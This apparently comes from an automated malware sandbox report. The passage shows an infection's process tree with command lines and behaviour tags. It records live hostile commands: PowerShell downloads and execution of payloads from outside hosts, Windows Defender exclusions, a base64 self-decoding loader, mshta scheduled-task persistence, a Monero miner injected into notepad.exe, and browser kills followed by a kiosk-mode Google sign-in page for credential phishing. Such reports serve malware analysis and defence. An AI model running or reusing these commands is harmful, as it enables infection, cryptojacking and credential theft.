C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3484,i,16918982237869938154,5001213302799639046,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:17⤵
- Uses browser remote debugging
PID:10572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3492,i,16918982237869938154,5001213302799639046,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:17⤵
- Uses browser remote debugging
PID:10656
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\9zcba" & exit6⤵
- System Location Discovery: System Language Discovery
PID:10440 -
C:\Windows\SysWOW64\timeout.exetimeout /t 117⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:10728
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10063820101\BrokPyR.exe"C:\Users\Admin\AppData\Local\Temp\10063820101\BrokPyR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\10063820101\BrokPyR.exe"C:\Users\Admin\AppData\Local\Temp\10063820101\BrokPyR.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:12768 -
C:\Users\Admin\AppData\Local\Temp\tmpir8pchlk.exeC:\Users\Admin\AppData\Local\Temp\tmpir8pchlk.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:8272 -
C:\Windows\system32\notepad.exe"C:\Windows\system32\notepad.exe" --donate-level 2 -o pool.supportxmr.com:3333 -u 43cpZ7ZhuutZwtdk81zbnSK9MaarnTsUy3bh3T9HgSdC8uKgRwWxPCG6M3eBWJiunr76d6UUKL3JgdaTSCTrNQLW1XeNfDT -k -p Admin --cpu-max-threads-hint=707⤵PID:8868
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064520101\lBiQciH.exe"C:\Users\Admin\AppData\Local\Temp\10064520101\lBiQciH.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:7560 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\uqthrtzoqetw', 'C:\Users', 'C:\ProgramData'"5⤵PID:9544
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\uqthrtzoqetw', 'C:\Users', 'C:\ProgramData'"6⤵
- Command and Scripting Interpreter: PowerShell
PID:13064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\Admin\AppData\Local\uqthrtzoqetw\ynjrybyoa.exe'"5⤵PID:11292
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\Admin\AppData\Local\uqthrtzoqetw\ynjrybyoa.exe'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
PID:11748
-
-
-
C:\Users\Admin\AppData\Local\uqthrtzoqetw\ynjrybyoa.exe"C:\Users\Admin\AppData\Local\uqthrtzoqetw\ynjrybyoa.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:12128
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064720101\525ffce19b.exe"C:\Users\Admin\AppData\Local\Temp\10064720101\525ffce19b.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:10020 -
C:\Users\Admin\AppData\Local\Temp\is-5E4MS.tmp\525ffce19b.tmp"C:\Users\Admin\AppData\Local\Temp\is-5E4MS.tmp\525ffce19b.tmp" /SL5="$403DC,20459747,844800,C:\Users\Admin\AppData\Local\Temp\10064720101\525ffce19b.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:10264 -
C:\Users\Admin\AppData\Roaming\MyApp\data\KMSpico.exe"C:\Users\Admin\AppData\Roaming\MyApp\data\KMSpico.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:10584 -
C:\Users\Admin\AppData\Local\Temp\is-UIMRN.tmp\KMSpico.tmp"C:\Users\Admin\AppData\Local\Temp\is-UIMRN.tmp\KMSpico.tmp" /SL5="$1042C,2952592,69120,C:\Users\Admin\AppData\Roaming\MyApp\data\KMSpico.exe"7⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer Phishing Filter
PID:10676 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Program Files\KMSpico\scripts\Install_Service.cmd""8⤵PID:2008
-
C:\Windows\system32\sc.exesc create "Service KMSELDI" binPath= "C:\Program Files\KMSpico\Service_KMS.exe" type= own error= normal start= auto DisplayName= "Service KMSELDI"9⤵
- Launches sc.exe
PID:9784
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Program Files\KMSpico\scripts\Install_Task.cmd""8⤵PID:13064
-
C:\Windows\system32\schtasks.exeSCHTASKS /Create /TN "AutoPico Daily Restart" /TR "'C:\Program Files\KMSpico\AutoPico.exe' /silent" /SC DAILY /ST 23:59:59 /RU "NT AUTHORITY\SYSTEM" /RL Highest /F9⤵
- Scheduled Task/Job: Scheduled Task
PID:5440
-
-
-
C:\Program Files\KMSpico\UninsHs.exe"C:\Program Files\KMSpico\UninsHs.exe" /r0=KMSpico,default,C:\Users\Admin\AppData\Roaming\MyApp\data\KMSpico.exe8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:9424
-
-
C:\Program Files\KMSpico\KMSELDI.exe"C:\Program Files\KMSpico\KMSELDI.exe" /silent /backup8⤵
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Indicator Removal: Clear Persistence
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Control Panel
- Modifies data under HKEY_USERS
PID:9068
-
-
C:\Program Files\KMSpico\AutoPico.exe"C:\Program Files\KMSpico\AutoPico.exe" /silent8⤵
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Indicator Removal: Clear Persistence
- Modifies Control Panel
- Modifies data under HKEY_USERS
PID:5828
-
-
-
-
C:\Users\Admin\AppData\Roaming\MyApp\core.exe"C:\Users\Admin\AppData\Roaming\MyApp\core.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:10592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.com - Not Found (#404)</title> </head> <body> <h1>Not Found (#404)</h1> <p>This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.</p> </body> </html>7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:10276
-
-
-
C:\Users\Admin\AppData\Roaming\MyApp\info.exe"C:\Users\Admin\AppData\Roaming\MyApp\info.exe"6⤵
- Executes dropped EXE
PID:10756
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064730101\518661c5fc.exe"C:\Users\Admin\AppData\Local\Temp\10064730101\518661c5fc.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2312 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
PID:7152
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064740101\6a172933cd.exe"C:\Users\Admin\AppData\Local\Temp\10064740101\6a172933cd.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6216 -
C:\Users\Admin\AppData\Local\Temp\ZH66FT2SF3KZS55G4K6E7.exe"C:\Users\Admin\AppData\Local\Temp\ZH66FT2SF3KZS55G4K6E7.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:9196
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064750101\419748d64b.exe"C:\Users\Admin\AppData\Local\Temp\10064750101\419748d64b.exe"4⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- System Location Discovery: System Language Discovery
PID:2104
-
-
C:\Users\Admin\AppData\Local\Temp\10064760101\b9c645bc7c.exe"C:\Users\Admin\AppData\Local\Temp\10064760101\b9c645bc7c.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3548 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:12084
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:7548
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:7640
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:7836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:7908
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking5⤵PID:8000
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking6⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:8024 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1956 -prefsLen 27100 -prefMapHandle 1960 -prefMapSize 270279 -ipcHandle 2056 -initialChannelId {411420b8-061e-40b2-8ca9-5df6a3b166da} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu7⤵PID:8316
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27136 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {1cf3bb7f-3af9-4801-9f9a-5eb70578cd45} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket7⤵PID:2208
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3808 -prefsLen 25164 -prefMapHandle 3812 -prefMapSize 270279 -jsInitHandle 3816 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3840 -initialChannelId {30a8fcd8-c6b1-4f95-b090-92062cbe5bd5} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab7⤵
- Checks processor information in registry
PID:9512
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4040 -prefsLen 27277 -prefMapHandle 4044 -prefMapSize 270279 -ipcHandle 4132 -initialChannelId {e78a1422-f2e6-40b1-a4d8-c48b9f2ecfbb} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd7⤵PID:12740
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4564 -prefsLen 34776 -prefMapHandle 4568 -prefMapSize 270279 -jsInitHandle 4572 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4580 -initialChannelId {a6b768b0-5991-4649-b071-f13ea8ccffe5} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab7⤵
- Checks processor information in registry
PID:1260
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4912 -prefsLen 35013 -prefMapHandle 5228 -prefMapSize 270279 -ipcHandle 5232 -initialChannelId {5157e63c-1031-4e55-abd5-ab6a01a74e12} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility7⤵
- Checks processor information in registry
PID:6424
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5380 -prefsLen 32952 -prefMapHandle 5384 -prefMapSize 270279 -jsInitHandle 5388 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1476 -initialChannelId {a648f0db-9fd3-4270-a2e4-3afe7421d14f} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab7⤵
- Checks processor information in registry
PID:11816
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5412 -prefsLen 32952 -prefMapHandle 5416 -prefMapSize 270279 -jsInitHandle 5420 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5432 -initialChannelId {385986f8-2dc5-48b0-a4ae-810651bd1d6b} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab7⤵
- Checks processor information in registry
PID:8664
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5788 -prefsLen 32952 -prefMapHandle 5792 -prefMapSize 270279 -jsInitHandle 5796 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2952 -initialChannelId {1c705ffa-582c-453a-a9ad-37c86cc700a1} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab7⤵
- Checks processor information in registry
PID:11960
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4920 -prefsLen 33002 -prefMapHandle 4856 -prefMapSize 270279 -jsInitHandle 1760 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4872 -initialChannelId {ce1320c4-3fd7-401e-8277-063b8c48d12b} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab7⤵
- Checks processor information in registry
PID:10184
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4328 -prefsLen 33002 -prefMapHandle 6312 -prefMapSize 270279 -jsInitHandle 6308 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6320 -initialChannelId {a14becd1-6cba-471f-870d-fe51942b1269} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab7⤵
- Checks processor information in registry
PID:1704
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 1 -prefsHandle 5000 -prefsLen 36739 -prefMapHandle 5032 -prefMapSize 270279 -ipcHandle 3268 -initialChannelId {626329a6-3b3e-4bf8-ab37-8c7797f0bf7d} -parentPid 8024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 12 utility7⤵
- Checks processor information in registry
PID:12660
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064770101\ccabf7b229.exe"C:\Users\Admin\AppData\Local\Temp\10064770101\ccabf7b229.exe"4⤵
- Executes dropped EXE
PID:9320 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn xUPO2mav1ad /tr "mshta C:\Users\Admin\AppData\Local\Temp\3y6HYecPv.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
PID:10204 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn xUPO2mav1ad /tr "mshta C:\Users\Admin\AppData\Local\Temp\3y6HYecPv.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5624
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\3y6HYecPv.hta5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:11052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'Q4EE54ZEZ66SPLEOVOFXJNLLB2RT5GEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.39.17.162/testmine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:3664
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064780101\6ad67669e5.exe"C:\Users\Admin\AppData\Local\Temp\10064780101\6ad67669e5.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1884 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10064780101\6ad67669e5.exe"5⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:11532
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064790101\BrokPyR.exe"C:\Users\Admin\AppData\Local\Temp\10064790101\BrokPyR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:9836 -
C:\Users\Admin\AppData\Local\Temp\10064790101\BrokPyR.exe"C:\Users\Admin\AppData\Local\Temp\10064790101\BrokPyR.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:13028 -
C:\Users\Admin\AppData\Local\Temp\tmpd8i_9vv4.exeC:\Users\Admin\AppData\Local\Temp\tmpd8i_9vv4.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:12792 -
C:\Windows\system32\notepad.exe"C:\Windows\system32\notepad.exe" --donate-level 2 -o pool.supportxmr.com:3333 -u 43cpZ7ZhuutZwtdk81zbnSK9MaarnTsUy3bh3T9HgSdC8uKgRwWxPCG6M3eBWJiunr76d6UUKL3JgdaTSCTrNQLW1XeNfDT -k -p Admin --cpu-max-threads-hint=707⤵PID:5460
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064800101\i5Kz53x.exe"C:\Users\Admin\AppData\Local\Temp\10064800101\i5Kz53x.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5536 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:7960
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064810101\23f282f58a.exe"C:\Users\Admin\AppData\Local\Temp\10064810101\23f282f58a.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:8060 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 7565⤵
- Program crash
PID:8872
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064820101\GitcS6s.exe"C:\Users\Admin\AppData\Local\Temp\10064820101\GitcS6s.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:10352
-
-
C:\Users\Admin\AppData\Local\Temp\10064830101\Hmcm0Oj.exe"C:\Users\Admin\AppData\Local\Temp\10064830101\Hmcm0Oj.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:10292
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10064841121\690BRuM.cmd"4⤵
- System Location Discovery: System Language Discovery
PID:1140 -
C:\Windows\SysWOW64\cmd.exeCmd.ExE /c StARt /mIn PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\Admin\AppData\Local\Temp\10064841121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"5⤵PID:4064
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\Admin\AppData\Local\Temp\10064841121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"6⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
PID:10024 -
C:\Users\Admin\AppData\Local\ZskZOgxSzfJebDEwQ.exe"C:\Users\Admin\AppData\Local\ZskZOgxSzfJebDEwQ.exe" C:\Users\Admin\AppData\Local\JYhVoaFaykTob.au37⤵
- Executes dropped EXE
PID:6584
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064850101\zBbvtJ0.exe"C:\Users\Admin\AppData\Local\Temp\10064850101\zBbvtJ0.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:12792 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
PID:7532
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064860101\7IPCJFu.exe"C:\Users\Admin\AppData\Local\Temp\10064860101\7IPCJFu.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1372
-
-
C:\Users\Admin\AppData\Local\Temp\10064870101\235T1TS.exe"C:\Users\Admin\AppData\Local\Temp\10064870101\235T1TS.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:12808
-
-
C:\Users\Admin\AppData\Local\Temp\10064880101\LAc2heq.exe"C:\Users\Admin\AppData\Local\Temp\10064880101\LAc2heq.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:8436 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
PID:12440
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064890101\xztOH3r.exe"C:\Users\Admin\AppData\Local\Temp\10064890101\xztOH3r.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:11832 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵PID:1056
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4424
-
-
-
C:\Users\Admin\AppData\Local\Temp\10064900101\WE297Tp.exe"C:\Users\Admin\AppData\Local\Temp\10064900101\WE297Tp.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:12568 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:12016 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"6⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:7324 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ff82fe0dcf8,0x7ff82fe0dd04,0x7ff82fe0dd107⤵PID:7276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1592,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2592 /prefetch:37⤵PID:6556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2484,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2480 /prefetch:27⤵PID:7604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2176,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2604 /prefetch:87⤵PID:7656
-
-
